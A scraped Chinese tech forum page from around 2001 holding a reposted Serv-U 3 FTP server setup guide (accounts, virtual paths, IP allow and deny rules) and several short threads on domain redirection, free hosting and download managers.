  1、在浏览器中登录：格式为“ftp://ftp.dasha.com”或“ftp://用户@ftp.abc.com”。如果匿名用户被允许登录，则第一种格式就会使用匿名登录的方式；如果匿名不被允许，则会弹出选项窗口，供输入用户名和密码。第二种格式可以直接指定用某个用户名进行登录。
2、在DOS下登录：格式为“ftp ftp.abc.com”。
3、用FTP客户端软件登录
4、如果“主目录”下有与用户同名的“虚拟目录”或“实际目录”，则该用户会直接登录到其同名目录中。
注意第二部的工作，你还可以填加另一个ＦＴＰ站点，不过之前，你还得进行第一步的工作。
三，开始客户端的ＦＴＰ服务器软件设置。
下边的工作便是serve-u的设置了，再转一个:
Serv-U 3.0.0.17 使用详解 (转贴)

主要新功能:
* 以 WindowsNT/2000/XP... 的 Service 形式运行, 可以随开机而启动服务
* 把服务器和管理工具分离, 而管理工具可以远程配置 Serv-U 3 的服务器
* 虚拟路径映射 (Virtual path mappings), 可以很方便地把不同分区, 甚至
不同机器上的路径都映射到你想它出现的位置, 对于登录用户来说, 他根本
看不出虚拟映射和实际有什么分别
* 似乎对 DoS (Deny Of Service) 攻击有点对策, 实际应用情况不清楚

主要特性:
* 看来内存比 2.x 占用得多不了多少 (当管理工具没打开时)
* 至少不会比 2.x 慢
* 注册码有点难度, 竟然出了几天都没注册机
更有cracker说它用了 ECC (Elliptic Curves) , 很可能永远都出不了注册机?
现在有的是破解版, 可能有人感觉不太舒服吧?

综上所述, 对于 2.x 的用户来说, 如果没用到主要的新功能, 不换也没什么不好,
但如果想换又不知如何配置, 请看下回分解~~~
原文再续书接上一回, 话说上次说到对于想升级又怕不会用的人, 你可以放心了,
你只要保留你原本 2.x, 升级安装上去, Serv-U 3 就会自动按原设定配置服务器,
根本不用你动手, 所以, 这篇基本上是废话...

欲知重头安装该怎样做, 或想知各种功能的用法, 请看下回分解!
Step #1. 安装
点击安装程序, 直点 Next 就完成了. 没什么好说的.

Step #2. 第一次运行
安装完成后, 服务器的Service会启动, 管理工具会自动运行, 你看到的, 是要你
配置好它的 Setup Wizard... 唔... 基本上 Next 下去就是了, 下面几个可能你
会有兴趣:
Domain name: 域的名字
Allow anonymous access: 要让匿名登录吗? (选 No 可以跳过这部分)
Annoymous home directory: 匿名登录后, 用户会看到的目录
Lock annoymous users into their home directory: 选Yes, 不要让他们乱跑
Create named account: 要建立有非匿名用户吗?
输入用户名, 密码.
(大约和上面过程一样)
Account admin priviledge: 这个用户有远程管理 Serv-U 3 的权限吗?
呵呵. 通常选 No priviledge 吧.
嘿! 基本上搞好了!

Step #3. 认识 Serv-U 3 管理工具的的界面
左边的树状结构是 Serv-U 3 的结构层次:
1. Serv-U Server 下面是管理工具在管理的 FTP,
其中<<Local Server>>就是你机上那个服务器了.

2. 在每个服务器中...
License: 给你填注册码
Settings: 服务器总配置
Activity: 给你监测本服务器的运作情况
Domains: 下面的各个 Domain, 是以你的机器拥有的不同IP开的服务器,
按刚才"第一次运行"来做, 你现在会有一个 Domain 了.

Step #4: 整体配置
在<<Local Server>>的Settings:

General: 总体限制, 参数设置
Max. Speed- 总体限速,
不设的话, 极速可达约 1MBytes/S.
Max no. of users - 同时的连接数目
不要太多, 很伤硬盘的, 建议不超过20
Check Anonymous password - 匿名登陆密码检查,
不要选, 否则 IE 不能进入.
Block Anti Time-out schemes
Block "FTP_bounce"...
主要是把些无聊人赶掉, 都选吧, 细节看 Help
Block users who connect...
随意, 用于"罚"一下用多线程下载的用户.
其馀选项看 Help 吧.

Dir Cache: 目录缓存
用户较多时, 可以明显加快用户浏览的速度,
把它打开, 用默认的 Max.Size 25, Time-out 600 sec. 差不多了.
Auto-Refresh 选取后你会看到在缓存中有哪些目录

Advanced:
Server:
Enable security - 安全设置生效
一定要选上! 否则你会死得很难看. KAKAKA
Sockets:
Inline out-of-band data
选取后听说可以防止 DoS 攻击, 但默认没选, 你自己决定吧.

至于如何配置用户, 就请看下回分解!
原文再续书接上一回, 话说上次说到我们有了个服务器,
但没设好域里的用户, 也是没用的, 所以...

Step #1: 域 (Domain) 配置
在 Domains 下选取你的域吧!
Name: 域的名字
Domain IP address: 为简单起见, "Use any available IP address" 算了吧.
Domain type:
Store in .INI file 比较好,
它把你的服务器的设置都放到 ServUDaemon.ini ,
重装系统后把这文件放上去就行了.
FTP port number:
通常是 21

Settings:
General:
Max no. of users - 同时的连接数目
和上一个差不多, 不过是在域里限制
Virtual path mapping - 请看 VPM 篇
Links - 同上
Messages:
很好玩的, 可以把别人登录看到的信息都改掉.
Logging:
就是 log 啊. 不懂? 看 help!

Step #2: 用户帐号
在 Domains 下...
Users... 右击出现新增/移除用户选单.

点选任一用户后, 各项用户参数意义:

Account:
Disable account: 暂时令它失效
Automatically remove account on date: 到了某日期就删掉该用户! (爽!)
User name: 不用多说吧?
Password: 留空不填代表不用密码
Home directory: 这用户登录时看到的第 1 个目录
Lock user in home directory:
最如想在用这帐号登陆后, 看到的根目录是所设的 Home Directory,
就选吧. (建议选取, 否则地址会比较难看)
Priviledge: 这用户远程管理 Serv-U 服务器的权限, 具体看 HELP

General:
Allow only N login(s) from same IP address
限制同一 IP 用这帐号的连接数, 选了它吧!
如果考虑到用 IE 的用户, 最好设两个连接,
否则对方可能不能下载, 如果狠心点, 设 1 个也没关系!
Max upload Speed.
用这帐号, 每一个连接上传文件的极速.
Max download Speed
用这帐号, 每一个连接下载的极速.
Idle time-out
发呆多久才 kick 他出去, 个人认为 5 分钟都够了.
Sesson time-out
无论他有没有发呆, 上来一段时间后就把他 KICK 走, 即使他在下载
什么东东也照踢不误, 并且在 1 分钟内不让他再上来. 这样在很忙下载
站点中可能有用, 可以让多点人有机会访问, 不过确是有点讨厌. 呵呵
Max. no. of users
这帐号同时允许的总连接数目.
其馀的比较少用, 看 HELP 吧.
Dir Access:
这里设置这用户对你硬盘中, 实际路径的读写权限, 关键哦!
无论是 HOME 目录好, 映射目录也罢. 要让用户用得到, 也要在这里加
具体意义在界面上也很明确吧. 不多说了, 但别忘了.
(记得把 HOME 目录在这里加多一次, files-[read], directories-[list]
这样人家看能看到, 下载到你的东东....)

Step #3: 群组帐号
在 Domains 下...
Groups... 右击出现新增/移除用户选单.

看上去很简单是不是? 对了. 把一个 Group 设置了一点参数,
在任一用户 - Account - Group(s) 中把他加进去, 他就拥有那个参数的权限.
有什么用? 你自己想想吧.

哈哈... 基本上我们都搞好了, 但是重头戏 Virtual path mappings 还没出场,
到底这东东有什么用处, 又是什么设置的呢? 请看下回分解!

原文再续书接上一回, 话说上次说到 Virtal path mappings 就打住不说,
究竟是什么原因呢? 这是因为很多老鸟都对上面几篇一屑不顾, 但却往往
死在 VPM 手上, 但是死在 VPM 的石榴裙下也甘心了. 呵呵....

在 Domains 下...
Settings:
General:
Virtual path mappings:

Step #1: 虚拟路径映射的概念:
1. Physical path: 目录的实际路径
可以是任何Windows分区上任何东东, 甚至网络邻居里的也可以
2. Mapped to: 映射到... (这个目录必须实际存在)
你想把它"变到"你硬盘里的那个目录呢?
你可以用到两个变量:
%HOME% : 即"Home directory"
%USER% : 用户名
3. mapped path name:
这个虚拟目录在显示出来的名字
4. 记得要在各用户的 Dir access 中设置它对实际路径的权限哦!!!!

Step #2: 举例:
1. 你想把 f:\movie\ 映射到匿名登录后看到的 \MyMovie 目录:
Physical path: f:\movie\
Mapped to: %HOME%
mapped path name: MyMovie
在 anonymous 帐号对 f:\movie\ 设 file - read, dir - list 权限
2. 你想把 g:\mp3\ 映射到 alex 登录后看到的 \Audio\MySongs 目录:
Physical path: g:\mp3\
Mapped to: %HOME%\Audio
mapped path name: MySongs
在 alex 帐号对 g:\mp3\ 设 file - read, dir - list 权限

哈哈. 还有封人的方法没说吧? 欲知后事如何, 请看下回分解!
关于多级目录映射的补充。。 来自fiend-smth
有点混乱。。嘿嘿

原文再续书接上一回, 封人对于很多人来说都是很过瘾的事,
所以就有这篇东东了...

Step #1. 按 IP 封
在 Serv-U 中, IP Access 很多地方都有出现, 这就是限制 IP 访问的地方了.
Domain- Settings 里有; 各用户- Settings 里有; 各群组- Settings 里也有.
IP access:
如果要限制 IP, 就在这里设置. 限制是由上到下执行检查的.
这里给出一些例子: (!注意次序!)
1. 只对某几个 IP 开放帐号:
----------------
A: 202.38.241.8
A: 202.38.249.2
A: 202.38.248.3
D: *
----------------
意思是, 对 202.38.241.8 , 202.38.249.2 , 202.38.248.3
开放, 其馀都不准进入
2. 只对一个网段开放:
----------------
A: 202.38.241.*
D: *
-----------------
意思是, 只对 202.38.241.* 开放, 其馀拒绝
3. 只拒绝部分IP
--------------
D: 123.166.*.*
D: 202.38.234.56
A: *
--------------
拒绝 123.166.*.* 的B类网段, 及 202.38.234.56 访问,
其馀都欢迎
看了三个例子, 大家都志该知道 IP 限制如何设置吧,
要注意的一点是, 最后一个限制项目, 最好要设成
A: * (其馀都允许进入) 或
D: * (其馀都不准进入)
否则, 可能会得不到预期中的限制的效果.

Step #2. 看不爽封
如果有个人连了上来, 你看他不爽想封掉他.
在 <<Local Server>> - Activity 或
你的Domain - Activity 会看到他,

右击, KILL USER .............

他在你FTP的命运就在你手中了.

看完了吧，一定要看完。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：如何在局域网里架设自己的ftp服务器？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我在新网chindns申请的域名指向在万网的页面有没有问题？

计算机技术
我在新网chindns申请的域名指向在万网的页面有没有问题？

上一贴 | 下一贴
发表人 主题: 我在新网chindns申请的域名指向在万网的页面有没有问题？
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-08 09:39:21 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
问问清楚先。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-08 09:53:05 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
不知道你这里指的是转向还是绑定。
域名转向就象网易的YEAH，126的功能一样，不管哪个服务器上的页子只要可以访问你都可以转到那个地方去。
绑定就是域名对应的服务器，这需要虚拟主机服务商提供的DNS才能搞定同时你自己也可以申请一个域名把DNS改为你自己的服务器的DNS，你就可以对它进行解析。这一种不是那种隐藏/非隐藏URL转向。

千淘万漉虽辛苦，吹尽狂沙始到金。
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-08 10:03:40 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
因为我原来做的页面是放在万网的虚拟主机下面的，而现在要在chinadns.com新申请一个域名，把这个域名指向我们在万网的页面。

照火鸟你的说法，是不是转向，绑定两种方式都没有问题？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-08 13:05:49 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
菜菜子在上个帖子中说
引用:
因为我原来做的页面是放在万网的虚拟主机下面的，而现在要在chinadns.com新申请一个域名，把这个域名指向我们在万网的页面。

照火鸟你的说法，是不是转向，绑定两种方式都没有问题？

叫chinadns 做改IP指向到你万网的主机就可以了~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-08 13:27:47 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
菜菜子在上个帖子中说
引用:
因为我原来做的页面是放在万网的虚拟主机下面的，而现在要在chinadns.com新申请一个域名，把这个域名指向我们在万网的页面。

照火鸟你的说法，是不是转向，绑定两种方式都没有问题？

----------------
你这种是URL转向，很简单。我没有试过新网[CHINADNS]的用户管理面板。
我想他们应该会提供这方面的服务----用户可以自己设置URL转向地址。

千淘万漉虽辛苦，吹尽狂沙始到金。
上一贴 | 下一贴
快速回复 | 主题：我在新网chindns申请的域名指向在万网的页面有没有问题？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


gopher是什么协议？

计算机技术
gopher是什么协议？

上一贴 | 下一贴
发表人 | 主题: gopher是什么协议？
zy2003 超级用户 积分：376 发帖：143 来自： 注册：2001-10-09 | 发表于 2001-12-06 12:54:26 按此观看zy2003的个人资料 按此发邮件给zy2003 收藏该主题供以后查看 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP gopher是什么协议？它的作用？ [img]http://51abc.net/banner/banner2.gif[/img]
wjack 高级用户 积分：201 发帖：47 来自：上海 注册：2000-10-26 | 发表于 2001-12-06 13:09:16 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP gopher 是图形传输协议，两年前还很热得，国内还有不少gopher服务器，但是现在好像没有人提了，发现用处不大。 网站建设资源站，吐血推荐： http://www.subdesigner.com
上一贴 | 下一贴
快速回复 | 主题：gopher是什么协议？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


帮个大忙吧！！！

计算机技术
帮个大忙吧！！！

上一贴 | 下一贴
发表人 | 主题: 帮个大忙吧！！！
wxxkid 初级用户 积分：21 发帖：58 来自： 注册：2001-08-16 | 发表于 2001-12-15 21:01:51 按此观看wxxkid的个人资料 按此发邮件给wxxkid 访问wxxkid的主页 wxxkid 的 oicq 是3795173,查看 3795173 的资料 收藏该主题供以后查看 发送悄悄话给wxxkid 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wxxkid的IP 8U8的服务器被强制停止了，我的几个realplayer文件的歌没地方放了。放在chinaren和sohu却播放不了，而很多服务器又清理，不接受新注册。请问那里有较稳定的免费空间？？ http://wxxkid2.51.net http://bbkid2.home.chinaren.com http://28designer.51.net 千万别来这三个叶子！去了别后悔！
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-15 21:28:00 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP http://im286.dtsky.com/forumdisplay.php?s=a323c2d0ee2b215725c2efbba36a900a&forumid=1 这里有很多 WINDFLASH ::浅紫色FORUM::
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-15 23:22:26 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP www.t35.com 鸟语站。不过才30兆，ftp上传。无限制。支持ASP "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 | 主题：帮个大忙吧！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我有一个关于网页设计的问题？

计算机技术
我有一个关于网页设计的问题？

上一贴 | 下一贴
发表人 | 主题: 我有一个关于网页设计的问题？
flyinair 初级用户 积分：0 发帖：0 来自：beijing 注册：2001-12-13 | 发表于 2001-12-13 22:53:01 按此观看flyinair的个人资料 按此发邮件给flyinair 访问flyinair的主页 flyinair 的 oicq 是77560546,查看 77560546 的资料 收藏该主题供以后查看 发送悄悄话给flyinair 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyinair的IP 我有一个关于网页的问题。 我的网站虚拟主机是unix的。我在网站上有一些房屋出租信息需要经常更新。怎样用比较简单的方法设计，可以让特定用户自己更改信息（就是我们公司的打字员）。不用每次都重新制作主页上传。希望每天都随时改，（主要是增加新房源和删除旧的）。希望大家帮帮我，（我现在想是不是有类似论坛的程序，但限制用户权力，只有斑竹可以发表文章，别人只能看。但我不知哪里能找到。我的网站已经有了论坛，欢迎参观）http://www.wanziqianhong.com.cn/cgi-bin/bbs3000/list.cgi 多谢。 我在空中飞翔， 自由自在地飞翔， 自由的感觉让我激动， 来吧， 和我一起飞翔！
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-12-14 06:57:11 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP 需要后台程序的支持， 可以用asp, coldFusion等来实现。 我看过一个演示， 觉得ColdFusion很棒。在北美很流行。 在国内好象讨论得不多。 也许你可以到网络程序版问问。 行者无疆 Blueidea Web Team Team member
上一贴 | 下一贴
快速回复 | 主题：我有一个关于网页设计的问题？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


宽带上网用什么下载工具最爽

计算机技术
宽带上网用什么下载工具最爽

上一贴 | 下一贴
发表人 主题: 宽带上网用什么下载工具最爽
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-14 13:12:08 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
如题

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-14 13:23:02 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
netants

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-14 19:30:04 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
FLASHGET

千淘万漉虽辛苦，吹尽狂沙始到金。
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-15 07:58:13 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
火鸟王在上个帖子中说
引用:
FLASHGET

我也是用这个，但好象很慢（相对拨号），请问该怎么设置一下？

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-15 12:32:42 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
CrazyParty在上个帖子中说
引用:
火鸟王在上个帖子中说
引用:
FLASHGET

我也是用这个，但好象很慢（相对拨号），请问该怎么设置一下？

我一般一次只下载一个东东，线程5，没有变。
还有一个原因就是对方的服务器限制下载带宽或速度慢。

千淘万漉虽辛苦，吹尽狂沙始到金。
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-12-15 23:35:49 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
看下栽的服务器的限制。基本上为了限制过多下栽，会提出1-2个线程。看具体服务器说明
我用ADSL，蚂蚁跟get基本上都到过150K，这是用modem没优化的情况，而且我的线路不好。实际会好。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
蓝血人

初级用户
积分：-4
发帖：2
来自：
注册：2001-12-15
 发表于 2001-12-16 17:18:27 按此观看蓝血人的个人资料 按此发邮件给蓝血人 蓝血人 的 oicq 是21205183,查看 21205183 的资料 发送悄悄话给蓝血人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝血人的IP
下载的速度其实还要看你从什么地方下载，是要看服务器的。
我用的FLASHGET还不错
苍鹰

终级用户
积分：483
发帖：186
来自：鹰巢地府
注册：2001-11-25
 发表于 2001-12-16 17:30:57 按此观看苍鹰的个人资料 按此发邮件给苍鹰 访问苍鹰的主页 苍鹰 的 oicq 是43513616,查看 43513616 的资料 发送悄悄话给苍鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看苍鹰的IP
我宽带用IE自带下载工具可以达到240左右，用蚂蚁的话就是60多一点。FLASHGET
就是100左右了，感觉还是用IE自带的好，是IE 6。0的。我都是下载同一站点的同一
文件试过的哦！

→◇我可是个老实人◇←
Hotter

初级用户
积分：27
发帖：9
来自：
注册：2001-12-12
 发表于 2001-12-16 18:27:43 按此观看Hotter的个人资料 按此发邮件给Hotter 访问Hotter的主页 Hotter 的 oicq 是30360630,查看 30360630 的资料 发送悄悄话给Hotter 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Hotter的IP
如果是ADSL的话何必用NetAnts或者FlashGet呢？
那些只是针对modem拨号的用户.....

8da.HotTeR
http://wWw.8da.CoM.cN
http://Sc.8da.cOm.Cn
jesse

初级用户
积分：37
发帖：31
来自：
注册：2001-05-29
 发表于 2001-12-17 15:26:14 按此观看jesse的个人资料 按此发邮件给jesse 发送悄悄话给jesse 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jesse的IP
都差不多。
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-17 18:16:04 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
宽带害怕什么，直接下最爽！不过用flashget最好！蚂蚁在有些环境下不能下！

I am a freedog！
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-17 22:08:47 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
有了宽带就用IE下在吧，省了一两个软件的空间

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 08:46:28 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
我喜欢FTP

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-18 10:40:44 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
阿修罗飞天舞在上个帖子中说
引用:
我喜欢FTP

同意，还是用FTP比较快，毕竟是文件传输协议呀

缘是天定,份在人为.
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-18 13:08:17 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
这个问题是仁者见仁，智者见智，谁都有自己的选择。

我喜欢FLASHGET，不但下载速度很爽，而且多线程，断点续传，定时拨号，批量下载……等等等等的功能，可谓非常强大！他对于下载后文件的管理也是非常好用的，如果是一般上网用的话，强烈建议FLASHGET，毕竟有很多网站不直接支持FTP的。

上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-07 16:46:05 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
flashget
最好不要用ie的搞不好下载的软件文件丢失哦
dancing

叶恨花
现任版主
积分：4724
发帖：2226
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-07 16:57:24 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
喜欢Flashget,但有一些是它载不下来的,用Netant就正常,反之Netant也一样,所以呢,我是基本使用Fg,辅助用Na,都不行了就右键另存.

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

上一贴 | 下一贴
快速回复 | 主题：宽带上网用什么下载工具最爽
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于URL指向的问题

计算机技术
关于URL指向的问题

上一贴 | 下一贴
发表人 主题: 关于URL指向的问题
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-17 09:50:22 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
原有一个站点，域名为www.wiseweb.net.cn。 现新申请了一个域名www.golden-idea.net， 并将其URL指向www.wiseweb.net.cn. 怎么样设置可以使用户通过输入 www.golden-idea.net/***.htm 或 www.golden-idea.net/***/***.htm 访问到指定目录或指定文件。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-17 18:03:35 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
直接不行么？

I am a freedog！
